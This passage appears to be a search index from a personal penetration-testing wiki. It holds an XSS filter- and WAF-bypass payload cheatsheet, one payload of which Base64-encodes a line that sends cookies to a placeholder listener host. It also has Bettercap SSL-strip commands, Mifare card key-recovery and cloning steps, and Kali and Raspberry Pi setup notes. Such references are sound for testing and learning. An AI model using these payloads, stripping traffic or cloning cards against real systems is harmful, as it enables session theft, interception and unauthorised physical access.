", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#url-string-evasion", "title": "URL String Evasion", "text": "Assuming http://www.google.com/
is programmatically disallowed:
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ip-versus-hostname", "title": "IP Versus Hostname", "text": "<a href=\"http://66.102.7.147/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#url-encoding", "title": "URL Encoding", "text": "<a href=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#dword-encoding", "title": "DWORD Encoding", "text": "Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details:
<a href=\"http://1113982867/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#hex-encoding", "title": "Hex Encoding", "text": "The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):
<a href=\"http://0x42.0x0000066.0x7.0x93/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#octal-encoding", "title": "Octal Encoding", "text": "Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
<a href=\"http://0102.0146.0007.00000223/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#base64-encoding", "title": "Base64 Encoding", "text": "<img onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#mixed-encoding", "title": "Mixed Encoding", "text": "Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:
<a\n href=\"h \ntt p://6 6.000146.0x7.147/\"\n >XSS</a\n>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#protocol-resolution-bypass", "title": "Protocol Resolution Bypass", "text": "//
translates to http://
which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?://
(thanks to Ozh for part of this one). You can also change the //
to \\\\\\\\
. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
<a href=\"//www.google.com/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-1", "title": "Google \"feeling lucky\" part 1", "text": "Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword:
protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake
for instance. This no longer works within Firefox as of 2.0.
<a href=\"//google\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-2", "title": "Google \"feeling lucky\" part 2", "text": "This uses a very tiny trick that appears to work Firefox only, because of it's implementation of the \"feeling lucky\" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
<a href=\"http://ha.ckers.org@google\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-3", "title": "Google \"feeling lucky\" part 3", "text": "This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the \"feeling lucky\" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case \"google\"):
<a href=\"http://google:ha.ckers.org\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#removing-cnames", "title": "Removing CNAMEs", "text": "When combined with the above URL, removing www.
will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
<a href=\"http://google.com/\">XSS</a>\n
Extra dot for absolute DNS:
<a href=\"http://www.google.com./\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#javascript-link-location", "title": "JavaScript Link Location", "text": "<a href=\"javascript:document.location='http://www.google.com/'\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-replace-as-attack-vector", "title": "Content Replace as Attack Vector", "text": "Assuming http://www.google.com/
is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\\#x09;script:
was converted into java script:
, which renders in IE, Netscape 8.1+ in secure site mode and Opera):
<a href=\"http://www.google.com/ogle.com/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#assisting-xss-with-http-parameter-pollution", "title": "Assisting XSS with HTTP Parameter Pollution", "text": "Assume a content sharing flow on a web site is implemented as below. There is a \"Content\" page which includes some content provided by users and this page also includes a link to \"Share\" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the \"title\" parameter in the \"Content\" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the \"Share\" page.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-page-source-code", "title": "Content Page Source Code", "text": "`a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#share-page-source-code", "title": "Share Page Source Code", "text": "<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-page-output", "title": "Content Page Output", "text": "In this case if attacker set untrusted content title as \u201cThis is a regular title&content_type=1;alert(1)\u201d the link in \"Content\" page would be this:
<a href=\"/share?content_type=1&title=This is a regular title&content_type=1;alert(1)\">Share</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#share-page-output", "title": "Share Page Output", "text": "And in share page output could be this:
<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n
As a result, in this example the main flaw is trusting the content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#character-escape-sequences", "title": "Character Escape Sequences", "text": "All the possible combinations of the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\\x3c
\\x3C
\\u003c
\\u003C
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#methods-to-bypass-waf-cross-site-scripting", "title": "Methods to Bypass WAF \u2013 Cross-Site Scripting", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#stored-xss", "title": "Stored XSS", "text": "If an attacker managed to push XSS through the filter, WAF wouldn\u2019t be able to prevent the attack conduction.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#reflected-xss-in-javascript", "title": "Reflected XSS in Javascript", "text": "Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation: /?xss=500); alert(document.cookie);//\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#dom-based-xss", "title": "DOM-based XSS", "text": "Example: <script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation: /?xss=document.cookie\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-via-request-redirection", "title": "XSS via request Redirection", "text": " ...\nheader('Location: '.$_GET['param']);\n...\n
As well as:
..\nheader('Refresh: 0; URL='.$_GET['param']);\n...\n
This request will not pass through the WAF: /?param=<javascript:alert(document.cookie>)
This request will pass through the WAF and an XSS attack will be conducted in certain browsers. /?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#waf-bypass-strings-for-xss", "title": "WAF ByPass Strings for XSS", "text": " <Img src = x onerror = \"javascript: window.onerror = alert; throw XSS\">
<Video> <source onerror = \"javascript: alert (XSS)\">
<Input value = \"XSS\" type = text>
<applet code=\"javascript:confirm(document.cookie);\">
<isindex x=\"javascript:\" onmouseover=\"alert(XSS)\">
\"></SCRIPT>\u201d>\u2019><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
\"><img src=\"x:x\" onerror=\"alert(XSS)\">
\"><iframe src=\"javascript:alert(XSS)\">
<object data=\"javascript:alert(XSS)\">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=\"x:gif\" onerror=\"window['al\\u0065rt'](0)\"></img>
<iframe/src=\"data:text/html,<svg onload=alert(1)>\">
<meta content=\"
 1 
; JAVASCRIPT: alert(1)\" http-equiv=\"refresh\"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">
<iframe src=javascript:alert(document.location)>
<form><a href=\"javascript:\\u0061lert(1)\">X
</script><img/*%00/src=\"worksinchrome:prompt(1)\"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over\u200b <img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript:alert(1)>CLICKME
<input/onmouseover=\"javaSCRIPT:confirm(1)\"
<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>
<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#filter-bypass-alert-obfuscation", "title": "Filter Bypass Alert Obfuscation", "text": " (alert)(1)
a=alert,a(1)
[1].find(alert)
top[\u201cal\u201d+\u201dert\u201d](1)
top[/al/.source+/ert/.source](1)
al\\u0065rt(1)
top[\u2018al\\145rt\u2019](1)
top[\u2018al\\x65rt\u2019](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}
` (The payload should include leading and trailing backticks.) (alert())
source: OWASP / www-community
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/", "title": "Bettercap 1.6.2 Installation", "text": "", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#bettercap-162-installation", "title": "Bettercap 1.6.2 Installation", "text": "BetterCAP is a powerful, flexible, and portable tool created to perform various types of MITM attacks against a network
Bettercap 1.6.2 is legacy tool, but it performs ssl strip much better then Bettercap 2.x
Install Ruby Gem
apt install -y ruby-full libpcap-dev\ngem update --system\ngem install bettercap\n
Bettercap 1.6.2 installs the executable to /usr/local/bin/bettercap
Bettercap 2.x installs the executable to /usr/bin/bettercap
Both Bettercap 1.6.2 and 2.x shares the same executable name. In order to privet any collisions we will rename the Bettercap 1.6.2 executable to bettercap1.6.2
.
mv /usr/local/bin/bettercap /usr/local/bin/bettercap1.6.2\n
From this point you can run bettercap1.6.2 for Bettercap 1.6.2
and bettercap for Bettercap 2.x
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#bettercap-162-ssl-strip-examples", "title": "Bettercap 1.6.2 SSL Strip Examples", "text": "Basic SSL Strip Example
bettercap1.6.2 -X -T 192.168.1.104 --proxy\n
SSL Strip With XSS Example
bettercap1.6.2 -X -T 192.168.3.104 --proxy --proxy-module injectjs --js-data \"<script>alert('SSL STRIP, Script Injection')</script>\"\n
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#dbug", "title": "Dbug", "text": "To find that Bettercap installation from ruby gems:
gem environment\n
the path should be under GEM PATHP for example:
/var/lib/gems/2.7.0/gems/bettercap-1.6.2\n
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/kali-linux/", "title": "Kali Linux", "text": "", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/kali-linux/#minimal-headless-kali-linux-installation-works-for-cloud-vm-installation-no-gui", "title": "Minimal Headless Kali Linux installation - Works for Cloud VM Installation (NO GUI)", "text": "This is a simple guide to install Minimal Headless Kali Linux by converting a Debian Linux to Kali Linux distro without any unnecessary tools. Basically you install the tools you need.
Platforms Minimum Monthly Price DigitalOcean.com 5$ (This link provides 100$ for 60 days) First of all we will need a clean Debian Linux local or at any cloud provider with ssh access
Let's convert! We will install two packages which allow as to replace Debian's repo to kali repo
apt update\n
apt install -y gnupg gnupg2 wget\n
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n
rm -rf /etc/apt/sources.list\n
echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list\n
Now after we replaced the repo to Kali we need to install the Basic Kali Linux core
apt -y update\n
apt-cache search kali-linux\n
apt install -y kali-linux-core\n
apt-get -y update\n
apt-get -y dist-upgrade\n
apt-get -y autoremove\n
Reboot the server to complete the conversion process.
In order to test that you are using Kali Linux
uname -a\n
Or you can check the contents of the /etc/os-release
file for this Debian distribution. After we got our new Minimal Kali ready we need to cleanup some Debian's leftovers to finnish
systemctl stop rpcbind.socket rpcbind smbd\n
systemctl disable rpcbind.socket rpcbind smbd\n
That's It, now we can install any package we need from Kali repo.
Here are some of my personal packages I use daily
apt update && apt install -y \\\ncurl wget git dnsutils whois net-tools htop locate telnet traceroute \\\ndirb wfuzz dirbuster enum4linux gobuster nbtscan nikto nmap \\\nonesixtyone oscanner smbclient fern-wifi-cracker crowbar smbmap \\\nsmtp-user-enum sslscan tnscmd10g whatweb snmpcheck wkhtmltopdf \\\nsipvicious seclists wordlists hydra bully netcat-openbsd netcat-traditional \\\nadb fastboot realtek-rtl88xxau-dkms docker docker-compose crunch \\\nwifite apktool apksigner zipalign default-jre default-jdk man-db \\\nscreenfetch xsltproc binwalk python3-pip zlib1g-dev python2.7-dev \\\nsubfinder chrony hcxtools libssl-dev hcxdumptool hashcat hash-identifier \\\nlibpcap-dev npm sqlmap wpscan exploitdb minicom screen hashid nfs-common\n
", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/kali-linux/#fix-ssh-broken-pipe-in-kali", "title": "Fix SSH Broken Pipe in Kali", "text": "nano ~/.ssh/config\n
add this:
Host *\n IPQoS=throughput\n
", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/links/", "title": "Links for Penetration Testing Tools", "text": "", "tags": ["pt", "tools"]}, {"location": "penetration-testing/kali-linux/links/#usefully-tools-for-pentesters", "title": "Usefully Tools for Pentesters", "text": "Links Description Eicar Files Files With Virus Signature Credit Card Generator PayPal Credit Card Generator - Login Required ipleak.net Displays Information About Your IP mxtoolbox Network Tools Related to DNS jwt.io Allows You to Decode, Verify and Generate Json Web Tokens DNS Dumpster Domain Research Tool That Can Discover Hosts Related to a Domain SSL-Lab Deep Analysis of The Configuration of any SSL Web Server GraphQLmap Engine to interact with a graphqlr endpoint for penetration-testing purposes.", "tags": ["pt", "tools"]}, {"location": "penetration-testing/kali-linux/metasploit/", "title": "Metasploit Framework", "text": "", "tags": ["pt", "tools", "metasploit"]}, {"location": "penetration-testing/kali-linux/metasploit/#installation", "title": "Installation", "text": "apt install -y metasploit-framework postgresql\n
systemctl enable postgresql\n
systemctl start postgresql\n
msfdb init\n
Start:
msfconsole\n
", "tags": ["pt", "tools", "metasploit"]}, {"location": "penetration-testing/kali-linux/wifite/", "title": "Wifite", "text": "Wifite is an automated wireless attack tool.
Wifite2 Github page
In order to perform wifi attacks you need a wifi card with Monitor Mode
and Frame Injection
like Realtek rtl8812au chipset.
Suggested Wifi Dongles
Alfa AWUS036ACH Alfa AC1900 1200Mbps USB WiFi Adapter Alfa AWUS036ACS ", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/kali-linux/wifite/#install-in-kali", "title": "Install in kali", "text": "apt install wifite\n
", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/kali-linux/wifite/#install-pyrit-for-wifite", "title": "Install Pyrit for Wifite", "text": "Pyrit Github page
Install dependencies
apt install python zlib openssl git\n
The Install
cd ~\ngit clone https://github.com/JPaulMora/Pyrit.git;\npip install psycopg2 scapy;\ncd Pyrit\npython setup.py clean;\npython setup.py build;\npython setup.py install;\nrm -rf ~/Pyrit\n
", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/proxmark/about-proxmark/", "title": "About Proxmark3", "text": "The Proxmark is an RFID swiss-army tool, allowing for both high and low level interactions with the vast majority of RFID tags and systems world-wide.
There are few Promark Devices, and you can find them at the offical website. I personally use the device at the picture above, you can get one at
Proxmark3 - Amazon Proxmark3 - Aliexpress it's cheap and suites my needs
The RFID tags i use are duel band tags 13.56Mhz and 125KHz
RFID tags - Amazon RFID tags - Aliexpress Useful Links:
Official Proxmark Website Official Proxmark3 Github Repo Andprox - Android client ", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/cheatsheet/", "title": "Proxmark3 CheatSheet", "text": "", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/cheatsheet/#basics", "title": "Basics", "text": "Command Description hf search Identify High Frequency cards lf search Identify Low Frequency cards hw tune Measure antenna characteristics, LF/HF voltage should be around 20-45+ V hw version Check version hw status Check overall status", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/", "title": "Clone Mifare Classic 1K ISO14443A", "text": "", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#read-mifare-iso14443a-basic-information", "title": "Read Mifare ISO14443A Basic Information", "text": "proxmark3> hf search\n
Which results in a response along the lines of:
#db# DownloadFPGA(len: 42096)\nUID : de 0f 3d cd\nATQA : 00 04\nSAK : 08 [2]\nTYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1\nproprietary non iso14443-4 card found, RATS not supported\nNo chinese magic backdoor command detected\nPrng detection: HARDENED (hardnested)\nValid ISO14443A Tag Found - Quiting Search\n
As we can see the output ISO14443A Tag Found
it's Mifare 1k
card.
This also shows us the UID de0f3dcd
of the card, which we\u2019ll need later.
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#find-and-extract-the-32-keys-from-the-mifare-iso14443a", "title": "Find and Extract the 32 Keys From The Mifare ISO14443A", "text": "From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used)
proxmark3> hf mf chk * ?\n
This should show us the key we require looking something like
No key specified, trying default keys\nchk default key[ 0] ffffffffffff\nchk default key[ 1] 000000000000\nchk default key[ 2] a0a1a2a3a4a5\nchk default key[ 3] b0b1b2b3b4b5\nchk default key[ 4] aabbccddeeff\nchk default key[ 5] 4d3a99c351dd\nchk default key[ 6] 1a982c7e459a\nchk default key[ 7] d3f7d3f7d3f7\nchk default key[ 8] 714c5c886e97\nchk default key[ 9] 587ee5f9350f\nchk default key[10] a0478cc39091\nchk default key[11] 533cb6c723f6\nchk default key[12] 8fd0a4f256e9\n--sector: 0, block: 3, key type:A, key count:13\nFound valid key:[ffffffffffff]\n...omitted for brevity...\n--sector:15, block: 63, key type:B, key count:13\nFound valid key:[ffffffffffff]\n
If you see Found valid key:[ffffffffffff]
This shows a key of ffffffffffff
, which we can plug into the next command, which dumps keys to file dumpkeys.bin
.
proxmark3> hf mf nested 1 0 A ffffffffffff d\n
If you see see an a table like this in output without valid key
|---|----------------|---|----------------|---|\n|sec|key A |res|key B |res|\n|---|----------------|---|----------------|---|\n|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |\n|001| ffffffffffff | 0 | ffffffffffff | 0 |\n|002| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |\n|003| ffffffffffff | 1 | ffffffffffff | 1 |\n|004| ffffffffffff | 1 | ffffffffffff | 1 |\n|005| ffffffffffff | 1 | ffffffffffff | 1 |\n|006| ffffffffffff | 1 | ffffffffffff | 0 |\n|007| ffffffffffff | 1 | ffffffffffff | 1 |\n|008| ffffffffffff | 1 | ffffffffffff | 1 |\n|009| ffffffffffff | 1 | ffffffffffff | 1 |\n|010| ffffffffffff | 1 | ffffffffffff | 1 |\n|011| ffffffffffff | 1 | ffffffffffff | 1 |\n|012| ffffffffffff | 1 | ffffffffffff | 1 |\n|013| ffffffffffff | 1 | ffffffffffff | 1 |\n|014| ffffffffffff | 1 | ffffffffffff | 1 |\n|015| ffffffffffff | 1 | ffffffffffff | 1 |\n|---|----------------|---|----------------|---|\n
In this case use 002
key like this
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d\n
Now you should be able to dump the contents of the 32 keys from the original card. This dumps data from the card into dumpdata.bin
proxmark3> hf mf dump\n
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#clone-mifare-iso14443a-using-the-dumped-keys", "title": "Clone Mifare ISO14443A Using The Dumped Keys", "text": "At this point we\u2019ve got everything we need from the card, we can take it off the reader.
To copy that data onto a new card, place the (Chinese backdoor) card on the Proxmark.
This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command
proxmark3> hf mf restore 1\n
Copy the UID of the original card de0f3dcd
proxmark3> hf mf csetuid de0f3dcd\n
We\u2019re done.
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/utilities/clickjacking/", "title": "Clickjacking Test Page", "text": " Full Screen Version
", "tags": ["pt", "tools", "clickjacking"]}, {"location": "penetration-testing/utilities/idd-generator/", "title": "IID Generator & Validator", "text": "", "tags": ["pt", "tools", "IID"]}, {"location": "penetration-testing/utilities/idd-generator/#description", "title": "Description", "text": "This is a simple Java Script tool to validate or generate a random Israel's ID number.
", "tags": ["pt", "tools", "IID"]}, {"location": "penetration-testing/utilities/idd-generator/#credit-sources", "title": "Credit & Sources", "text": "The code was built by Georgy Bunin and cloned from his repository. It was slightly modified to fit this website.
", "tags": ["pt", "tools", "IID"]}, {"location": "raspberry-pi/docker-raspberrypi/", "title": "Docker and Docker-compose on Raspberry Pi", "text": "", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#how-to-install-docker-on-raspberry-pi", "title": "How to install docker on Raspberry Pi", "text": "sudo apt install -y docker.io\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#runing-docker-as-root", "title": "Runing Docker as root", "text": "sudo usermod -aG docker pi\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#manage-docker-as-a-non-root-user", "title": "Manage Docker as a non-root user", "text": "The Docker daemon binds to a Unix socket instead of a TCP port. By default that Unix socket is owned by the user root and other users can only access it using sudo. The Docker daemon always runs as the root user.
If you don\u2019t want to preface the docker command with sudo, create a Unix group called docker and add users to it. When the Docker daemon starts, it creates a Unix socket accessible by members of the docker group.
Warning
The docker group grants privileges equivalent to the root user.
sudo groupadd docker\nsudo usermod -aG docker $USER\nnewgrp docker\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#how-to-install-docker-compose-on-raspberry-pi", "title": "How to install docker-compose on Raspberry Pi", "text": "sudo apt install docker-compose\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/external-power-button/", "title": "External Power Button For Raspberry Pi", "text": "Python script to control Raspberry Pi with external power button - Wake/Power Off/Restart(Double Press)
Official Github Repo
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#raspberry-pi-power-button-wakepower-offrestartdouble-press", "title": "Raspberry Pi Power Button - Wake/Power Off/Restart(Double Press)", "text": "", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#information", "title": "Information", "text": "When Raspberry Pi is powered off, shortening GPIO3 (Pin 5) to ground will wake the Raspberry Pi.
This script uses pin GPIO3(5), Ground(6) with momentary button.
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#requirements", "title": "Requirements", "text": " Can be install via apt
sudo apt install python3-gpiozero\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#install", "title": "Install", "text": "This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/install.sh | bash\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#uninstall", "title": "Uninstall", "text": "curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/uninstall.sh | bash\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#default-behavior", "title": "Default Behavior", "text": "Button Press (Raspberry Pi is ON) Behavior Single Nothing Double Reboot Long press and releases (above 3 seconds) Power off Button Press (Raspberry Pi is OFF) Behavior Single Power On", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#check-if-service-is-running", "title": "Check if service is running", "text": "sudo systemctl status power_button.service\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/motion-sensor-display-control/", "title": "Motion Sensor Display Control", "text": "Python script to control connected display to Raspberry Pi using Motion Sensor (pir).
Official Github Repo
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#information", "title": "Information", "text": "This script uses pin GPIO4(7) to read data from Motion (PIR) Sensor, Any 5v and ground for PIR Sensor
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#requirements", "title": "Requirements", "text": " Can be install via apt
sudo apt install python3-gpiozero\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#install", "title": "Install", "text": "This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/install.sh | bash\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#uninstall", "title": "Uninstall", "text": "curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/uninstall.sh | bash\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#default-behavior", "title": "Default Behavior", "text": "Condition Behavior Motion while display is off Turns on display for 60 sec Motion while display is on Resets the timer for another 60 sec No motion > 60 sec Turns off the display", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#config", "title": "Config", "text": "File
/usr/local/bin/motion-display-control.py\n
You can change Data Pin of the PIR Sensor at gpio_pin value You can change Delay at display_delay value
Line
motion = Motion(gpio_pin=4, display_delay=60, verbose=False)\n
Restart the service to apply changes
sudo systemctl restart power_button.service\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#debug", "title": "Debug", "text": "In order to allow verbose debug change the following
File
/usr/local/bin/motion-display-control.py\n
Line
Set verbose value to True
motion = Motion(gpio_pin=4, display_delay=60, verbose=True)\n
Restart the service to apply changes
sudo systemctl restart motion-display-control.service\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#check-if-service-is-running", "title": "Check if service is running", "text": "sudo systemctl status motion-display-control.service\n
